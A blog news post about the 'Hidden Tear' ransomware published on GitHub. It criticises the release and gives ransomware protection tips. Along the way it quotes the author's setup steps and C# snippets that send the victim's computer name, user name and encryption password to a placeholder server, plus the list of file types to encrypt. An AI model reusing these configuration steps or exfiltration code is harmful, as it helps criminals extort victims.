Don't panic! You heard it right. You need to earn money demanding people for their data here is the way to become a cyber criminal.
A Turkish security researcher named
Utku Sen has posted a fully functional Ransomware code on open source
code sharing website GitHub.
The Ransomware dubbed Hidden Tear,
uses AES Encryption to lock down files before displaying a ransom message
warning to get users to pay up.
The currently undetectable version
of ransomware can be modified and implemented accordingly, as it contains every
feature a cybercriminal can expect from modern malware.
Sen describes his Ransomware as
"a ransomware-like file crypter sample which can be modified for specific
purposes." This means even script kiddies can now develop their own
Ransomware to threaten people.
The "Hidden Tear"
Ransomware package consists of four files namely:
Hidden Tear Ransomware is
capable of:
- Using AES algorithm to encrypt files
- Sending encryption key to a server
- Encrypting files and decrypting them using a decrypter program with the encryption key
- Creating a text file in Desktop with given message
- Small file size (12 KB)
- Evading detection by all standard anti-virus programs
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details
as well, he says:
1. You need to have a web
server that supports scripting languages such as PHP or Python. Then change the
below-mentioned line with your URL. (Better use HTTPS connection in order to
avoid eavesdropping):
string targetURL =
"https://www.example.com/hidden-tear/write.php?info=";
2. The script should write
the GET parameter to a text file. Sending process running in SendPassword()
function:
string info = computerName +
"-" + userName + " " + password;
var fullUrl = targetURL +
info;
var conent = new
System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions
can also be change. Default list:
var validExtensions =
new[]{".txt", ".doc", ".docx", ".xls",
".xlsx", ".ppt", ".pptx", ".odt",
".jpg", ".png", ".csv", ".sql", ".mdb",
".sln", ".php", ".asp", ".aspx",
".html", ".xml", ".psd"};
For Educational Purpose... REALLY!
Wait! Sen has something more to
say, listening to which you might think...REALLY!!
With the whole project
"Hidden Tear," there's an attached legal warning that says:
"While this may be
helpful for some, there are significant risks. The 'Hidden Tear' may be used
only for 'Educational Purposes.' Do not use it as a Ransomware! You
could go to jail on obstruction of justice charges just for running hidden
tear, even though you are innocent."
Somebody should ask him… Why
instigating people to commit a crime? One could imagine such "Educational
Purposes" as there's a big chance of Ransomware to pop up in recent
attacks.
A
visit to the Video Demonstration of the sandbox testing of 'Hidden Tear'
will give a real picture of what all it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Utilize the
Ransomware removal kit that could help you deal with various variants of
ransomware as well as help you unlock encrypted files without paying off to the
cyber crooks.
However, there are some important
steps that should be considered to protect yourself from Ransomware threats.
- Always keep regular backups of your important data.
- Make sure you run an active anti-virus security suite of tools on your system.
- Do not open email attachments from unknown sources.
- Most importantly, always browse the Internet safely.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.